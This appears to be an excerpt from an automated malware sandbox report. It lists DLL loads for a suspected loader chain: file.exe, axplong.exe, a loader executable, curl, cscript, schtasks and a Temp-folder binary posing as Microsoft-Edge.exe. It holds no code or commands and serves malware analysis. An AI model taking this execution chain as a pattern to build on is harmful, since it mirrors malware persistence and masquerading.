                        Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: pcacli.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: sfc_os.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
